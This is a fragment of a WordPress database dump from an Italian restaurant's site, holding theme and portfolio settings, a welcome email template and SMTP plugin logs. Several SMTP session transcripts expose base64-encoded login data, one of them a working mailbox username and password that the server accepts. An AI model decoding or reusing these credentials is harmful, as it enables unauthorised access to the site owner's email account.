Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32683,3095,'mkdf_portfolio_single_template_meta','small-images'),(32684,3095,'_dp_original','136'),(32685,3095,'_wp_old_slug','h1-2-2'),(32686,3095,'_wp_old_slug','h2-1'),(32687,3095,'_wp_old_slug','h2-4'),(32688,3095,'_wp_old_slug','kakalamba-appetizer'),(32689,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32690,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32691,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32692,3096,'_thumbnail_id','1058'),(32693,3096,'mkdf_page_content_behind_header_meta','no'),(32694,3096,'mkdf_page_content_padding','115px 0 100px 0'),(32695,3096,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32696,3096,'portfolio_single_back_to_link','84'),(32697,3096,'mkdf_disable_vertical_header_background_image_meta','no'),(32698,3096,'mkdf_disable_header_widget_areas_meta','no'),(32699,3096,'slide_template','default'),(32700,3096,'_wpb_vc_js_status','true'),(32701,3096,'mkdf-portfolio-image-gallery','567,566,565'),(32702,3096,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32703,3096,'mkdf_portfolio_single_template_meta','slider'),(32704,3096,'_dp_original','141'),(32705,3096,'_wp_old_slug','h2-3'),(32706,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32707,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32708,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32709,3097,'_thumbnail_id','1057'),(32710,3097,'mkdf_page_content_behind_header_meta','no'),(32711,3097,'mkdf_page_content_padding','115px 0 100px 0'),(32712,3097,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32713,3097,'portfolio_single_back_to_link','84'),(32714,3097,'mkdf_disable_vertical_header_background_image_meta','no'),(32715,3097,'mkdf_disable_header_widget_areas_meta','no'),(32716,3097,'slide_template','default'),(32717,3097,'_wpb_vc_js_status','true'),(32718,3097,'mkdf-portfolio-image-gallery','565,566,567'),(32719,3097,'mkdf_portfolio_single_template_meta','small-slider'),(32720,3097,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32721,3097,'_dp_original','568'),(32722,3097,'_wp_old_slug','h2-2'),(32723,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32724,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32725,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32726,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32727,3098,'mkdf_page_content_behind_header_meta','no'),(32728,3098,'mkdf_page_content_padding','115px 0 100px 0'),(32729,3098,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32730,3098,'portfolio_single_back_to_link','84'),(32731,3098,'mkdf_disable_vertical_header_background_image_meta','no'),(32732,3098,'mkdf_disable_header_widget_areas_meta','no'),(32733,3098,'slide_template','default'),(32734,3098,'_wpb_vc_js_status','true'),(32735,3098,'mkdf-portfolio-image-gallery','567,566,565'),(32736,3098,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32737,3098,'mkdf_portfolio_single_template_meta','gallery'),(32738,3098,'_thumbnail_id','1056'),(32739,3098,'_dp_original','580'),(32740,3098,'_wp_old_slug','h2-1'),(32741,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32742,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32743,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32744,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32746,3099,'mkdf_page_content_behind_header_meta','no'),(32747,3099,'mkdf_page_content_padding','115px 0 100px 0'),(32748,3099,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32749,3099,'portfolio_single_back_to_link','1008'),(32750,3099,'mkdf_disable_vertical_header_background_image_meta','no'),(32751,3099,'mkdf_disable_header_widget_areas_meta','no'),(32752,3099,'slide_template','default'),(32753,3099,'_wpb_vc_js_status','true'),(32754,3099,'mkdf-portfolio-image-gallery','567,566,565'),(32755,3099,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32756,3099,'mkdf_portfolio_single_template_meta','small-images'),(32757,3099,'_wp_old_slug','h1-2-2'),(32758,3099,'_wp_old_slug','h2-1'),(32759,3099,'_dp_original','933'),(32760,3099,'_wp_old_slug','h7-4'),(32761,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32762,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32763,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32764,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32765,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32766,3100,'mkdf_page_content_behind_header_meta','no'),(32767,3100,'mkdf_page_content_padding','115px 0 100px 0'),(32768,3100,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32769,3100,'portfolio_single_back_to_link','1008'),(32770,3100,'mkdf_disable_vertical_header_background_image_meta','no'),(32771,3100,'mkdf_disable_header_widget_areas_meta','no'),(32772,3100,'slide_template','default'),(32773,3100,'_wpb_vc_js_status','true'),(32774,3100,'mkdf-portfolio-image-gallery','567,566,565'),(32775,3100,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32776,3100,'mkdf_portfolio_single_template_meta','gallery'),(32778,3100,'_dp_original','936'),(32779,3100,'_wp_old_slug','h7-1'),(32780,3100,'_wp_old_slug','vegetable-cream-soup__trashed'),(32781,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32782,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32783,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32784,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32785,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32786,3101,'mkdf_page_content_behind_header_meta','no'),(32787,3101,'mkdf_page_content_padding','115px 0 100px 0'),(32788,3101,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32789,3101,'portfolio_single_back_to_link','1008'),(32790,3101,'mkdf_disable_vertical_header_background_image_meta','no'),(32791,3101,'mkdf_disable_header_widget_areas_meta','no'),(32792,3101,'slide_template','default'),(32793,3101,'_wpb_vc_js_status','true'),(32794,3101,'mkdf-portfolio-image-gallery','567,566,565'),(32795,3101,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32796,3101,'mkdf_portfolio_single_template_meta','slider'),(32797,3101,'_thumbnail_id','1030'),(32798,3101,'_dp_original','1021'),(32799,3101,'_wp_old_slug','h7-5'),(32800,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32801,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32802,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32803,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32804,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52243,4370,'_menu_item_type','custom'),(32806,3102,'mkdf_page_content_behind_header_meta','no'),(32807,3102,'mkdf_page_content_padding','115px 0 100px 0'),(32808,3102,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32809,3102,'portfolio_single_back_to_link','1008'),(32810,3102,'mkdf_disable_vertical_header_background_image_meta','no'),(32811,3102,'mkdf_disable_header_widget_areas_meta','no'),(32812,3102,'slide_template','default'),(32813,3102,'_wpb_vc_js_status','true'),(32814,3102,'mkdf-portfolio-image-gallery','567,566,565'),(32815,3102,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32816,3102,'mkdf_portfolio_single_template_meta','small-images'),(32817,3102,'_wp_old_slug','h1-2-2'),(32818,3102,'_wp_old_slug','h2-1'),(32819,3102,'_dp_original','1019'),(32820,3102,'_wp_old_slug','h7-6'),(32821,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32822,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32823,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32824,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32825,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32826,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52150,4359,'_menu_item_type_menu','wide'),(32828,2344,'mkdf_page_content_behind_header_meta','no'),(32829,2344,'mkdf_page_content_padding','115px 0 100px 0'),(32830,2344,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32831,2344,'portfolio_single_back_to_link','1008'),(32832,2344,'mkdf_disable_vertical_header_background_image_meta','no'),(32833,2344,'mkdf_disable_header_widget_areas_meta','no'),(32834,2344,'slide_template','default'),(32835,2344,'_wpb_vc_js_status','true'),(32836,2344,'mkdf-portfolio-image-gallery','567,566,565'),(32837,2344,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32838,2344,'mkdf_portfolio_single_template_meta','small-images'),(32839,2344,'_wp_old_slug','h1-2-2'),(32840,2344,'_wp_old_slug','h2-1'),(32841,2344,'_wp_old_slug','h7-6'),(32842,2344,'_dp_original','1048'),(32843,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32844,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32845,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32846,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32847,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52251,4370,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32849,2345,'mkdf_page_content_behind_header_meta','no'),(32850,2345,'mkdf_page_content_padding','115px 0 100px 0'),(32851,2345,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32852,2345,'portfolio_single_back_to_link','1008'),(32853,2345,'mkdf_disable_vertical_header_background_image_meta','no'),(32854,2345,'mkdf_disable_header_widget_areas_meta','no'),(32855,2345,'slide_template','default'),(32856,2345,'_wpb_vc_js_status','true'),(32857,2345,'mkdf-portfolio-image-gallery','565,566,567'),(32858,2345,'mkdf_portfolio_single_template_meta','small-slider'),(32859,2345,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32860,2345,'_wp_old_slug','h7-2'),(32861,2345,'_dp_original','1020'),(32883,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32884,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32885,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32886,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32887,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32888,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32889,2899,'_thumbnail_id','591'),(32890,2899,'mkdf_page_content_behind_header_meta','no'),(32891,2899,'mkdf_page_content_padding','115px 0 100px 0'),(32892,2899,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32893,2899,'portfolio_single_back_to_link','569'),(32894,2899,'mkdf_disable_vertical_header_background_image_meta','no'),(32895,2899,'mkdf_disable_header_widget_areas_meta','no'),(32896,2899,'slide_template','default'),(32897,2899,'_wpb_vc_js_status','true'),(32898,2899,'mkdf-portfolio-image-gallery','567,566,565'),(32899,2899,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32900,2899,'mkdf_portfolio_single_template_meta','slider'),(32901,2899,'_wp_old_slug','h8-5'),(32902,2899,'_dp_original','590'),(32903,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32904,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32905,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32906,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32907,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32908,2900,'_thumbnail_id','589'),(32909,2900,'mkdf_page_content_behind_header_meta','no'),(32910,2900,'mkdf_page_content_padding','115px 0 100px 0'),(32911,2900,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32912,2900,'portfolio_single_back_to_link','569'),(32913,2900,'mkdf_disable_vertical_header_background_image_meta','no'),(32914,2900,'mkdf_disable_header_widget_areas_meta','no'),(32915,2900,'slide_template','default'),(32916,2900,'_wpb_vc_js_status','true'),(32917,2900,'mkdf-portfolio-image-gallery','567,566,565'),(32918,2900,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32919,2900,'mkdf_portfolio_single_template_meta','masonry'),(32920,2900,'_wp_old_slug','h8-4'),(32921,2900,'_dp_original','588'),(37681,3700,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi stanszoqcjq,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>stanszoqcjq</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37680,3700,'original_subject','Your Sol Y Mar account has been created!'),(37679,3700,'original_to','stanszoqcjq@demo.com'),(37678,3700,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37677,3700,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37676,3700,'to_header','stanszoqcjq@demo.com'),(37674,3700,'success',''),(37675,3700,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37673,3700,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37683,3700,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 06 Jan 2021 18:59:26 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37682,3700,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(37691,3701,'original_subject','Your Sol Y Mar account has been created!'),(37692,3701,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi stanszoqcjq,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>stanszoqcjq</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37807,3714,'success',''),(37808,3714,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37809,3714,'to_header','webmaster@baldisserri.com'),(37810,3714,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37811,3714,'original_to','webmaster@baldisserri.com'),(37812,3714,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37815,3714,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 16 Jan 2021 19:38:59 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37814,3714,'original_headers',''),(37825,3715,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 16 Jan 2021 19:39:01 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <4e2497e0537f5a5822179d39be9dd7b8@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Sun, 17 Jan 2021 00:39:01 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Post=\r\n SMTP (from version 2.0.16 to 2.0.18)=0A=0A=0AIf you experience any issu=\r\nes or need support, the volunteers in the WordPress.org support forums m=\r\nay be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe Wor=\r\ndPress Team\r\n.\r\n250 OK id=1l0w5t-0002lf-S2\r\n'),(37824,3715,'original_headers',''),(37835,3716,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 18 Jan 2021 07:24:12 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37834,3716,'original_headers',''),(37831,3716,'original_to','webmaster@baldisserri.com'),(37832,3716,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37833,3716,'original_message','Howdy! Some plugins have 